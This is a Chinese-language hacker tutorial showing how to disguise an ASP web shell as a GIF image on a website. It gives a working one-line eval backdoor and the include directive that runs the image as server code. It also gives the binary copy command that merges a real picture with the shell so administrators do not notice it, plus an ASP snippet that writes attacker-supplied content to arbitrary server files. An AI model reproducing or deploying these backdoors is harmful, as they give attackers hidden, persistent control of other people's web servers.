一個網站裏面除了asp文件,再就數圖片文件最多了,它讓我們的網頁"美麗動人"嘻嘻,但是你有沒有想到過這裏面暗藏的殺機,圖片也可以是asp***。
asp***已經出現很長時間了,種類也越來越多,但是說到隱蔽性,我們紅魂老大寫的--冰狐浪子asp後門還是我衆馬中的首選,現在我們就把它作成圖片asp***。
首先我們把冰狐浪子asp***服務端直接該後綴名爲gif,記得用容錯格式:
<SCRIPT RUNAT=SERVER LANGUAGE=javascript>try{eval(Request.form("#")+"")}catch(e){}</SCRIPT>
一、include給我們指路
接下來要使用include指令,這個指令也是我們常常看到的,但是它有一個很特別的功能,可能你就沒有用到過了。這就是可以調用位於其它文件中的函數,不管它的後綴名是什麼,哪怕是個圖片文件。
然後我們新建一個asp文件,在裏面寫入<!--#include file="asp.gif"-->,當然你也可以把它插入到任何asp文件的頭部或者尾部,僅僅就這一句話。asp.gif就是冰狐浪子asp***服務端,也是一句話,這個圖片asp***就做好了。
不過這裏還有一個小問題,雖然網站裏圖片很多,但如果管理員不小心打開這個圖片,在IE上顯示的是一把小紅叉,他會怎麼想呢?
爲了不讓人懷疑,要讓我們的圖片美人動起來,讓它成爲真正的gif文件!
二、copy給我們加油
把asp.gif改名爲asp.asp,然後去找個圖片來,至於什麼內容的圖片,就看你自己的愛好啦,不過最好不要超過20kb,大了執行的速度就慢,把它保存爲1.gif。
再啓動windows下的dos窗口,鍵入copy 1.gif /b + asp.asp /a asp.gif
其中參數/b 是指定以二進制格式複製、合併文件。參數/a 是指定以ascll格式複製、合併文件。這裏要注意文件的順序。執行完後就會生成asp.gif,這就是我們的冰狐浪子asp***服務端。不過現在它已經僞裝成一個婷婷玉立的美人了,嘿嘿!如果要插入其他asp文件中,請插入下面代碼
<%
on error resume next
id=request("id")
if request("id")=1 then
testfile=Request.form("name")
msg=Request.form("message")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
<form method="POST" ACTION="你插入文件的文件名?id=1">
<!--#include file="UploadFile/asp.gif"-->
<% end if %>
這裏我們用一個id參數來蔽掉了,圖片所產生的亂碼。